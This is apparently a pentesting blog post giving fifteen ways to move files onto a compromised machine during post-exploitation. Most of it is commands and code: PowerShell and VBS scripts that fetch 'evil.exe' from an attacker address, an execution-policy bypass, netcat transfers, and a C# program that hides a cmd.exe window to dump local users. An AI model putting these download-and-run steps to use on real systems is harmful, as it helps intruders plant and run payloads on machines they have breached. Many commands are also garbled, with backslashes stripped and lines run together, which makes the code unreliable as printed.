Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, and system admins that just want to move files.
There are many other ways to move files onto machines during pentests, but this list includes some of my favorites. Below is a summary of the file transfer techniques that will covered in this blog.
- Powershell file download
- Visual Basic filw Download
- Perl file download
- Python file download
- Ruby file download
- PHP file download
- FTP file download
- TFTP file download
- Bitsadmin file download
- Wget file download
- Netcat file download
- Windows share file download
- Notepad dialog box file download
- Exe to Text, Text to EXE with PowerShell and Nishang
- Csc.exe to compile from source file.
Note: Many of the techniques listed should also be considered as options when executing commands through SQL injection. For the multi-line steps, ECHO the commands to a file, and then execute the file.
PowerShell File Download
PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows since Windows Server 2003. Below is an example of a simple script that can be used to download a file to the local file system from a webserver on the internet:
$p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file" "C:%homepath%file") To execute this script, run the following command in a PowerShell window:
PS C:> .test.ps1Or, we can echo it to the file.
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://192.168.10.5/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url, $file) >> wget.ps1powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1Sometimes, the PowerShell execution policy is set to restricted. In this case, you will not be able to execute commands or scripts through PowerShell… unless you just set it to unrestricted using the following command:
C:> powershell set-executionpolicy unrestrictedVisual Basic File Download
The final version of Visual Basic has come standard on Windows machines since 1998. The following script can download a file of your choosing. However, the script is quite larger than the PowerShell one.
echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > download.vbsCscript is a command line Windows Script Host that allows you to pass command line options and allows you to set script properties. It is not necessary to use this to run a vbs script in Windows 7 and possibly others, but using it allows your scripts to run on Windows XP machines and above.
To execute this script, run the following command in a command shell:
C:> cscript download.vbs http://demo/evil.exe evil.exePerl File Download
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");Python File Download
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read()) localFile.close()Ruby File Download
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } }PHP File Download
<?php
$data = @file("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh); ?>FTP File Download
ftp 127.0.0.1 username password get file exitTFTP File Download
tftp -i host GET C:%homepath%file location_of_file_on_tftp_serverBitsadmin File Download
bitsadmin /transfer n http://domain/file c:%homepath%fileWget File Download
wget http://example.com/fileNetcat File Download
cat file | nc -l 1234
nc host_ip 1234 > fileWindows Share File Download
net use x: \127.0.0.1share /user:example.comuserID myPasswordNotepad Dialog Box File Download
- Open notepad
- Go to file - open
- In the File Name box near the bottom, type in the full URL path to your file
Exe to Txt, and Txt to Exe with PowerShell and Nishang
PS > .ExetoText.ps1 evil.exe evil.txt
PS > .TexttoExe.ps1 evil.text evil.exeCsc.exe to Compile Source from a File
C sharp compiler (csc) is the command line compiler included with Microsoft .NET installations within Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Using this method, combined with SQL injection, can move an exe to a box without having to try to bypass egress filters or authenticated proxies that might block outbound connectivity.
The default location for this executable is the following:
C:\Windows\Microsoft.NET\Framework\versionUsing the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:Temp directory. This could obviously be modified to interact with different exe’s on the box, or completely re-written to use your own exploit code.
public class Evil {
public static void Main() {
System.Diagnostics.Process process = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = @"/C net user > users.txt";
process.StartInfo = startInfo;
process.Start();
}
}To compile your source code, type:
csc.exe /out:C:evilevil.exe C:evilevil.cs
./evilevil.exe
扫一扫
154
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
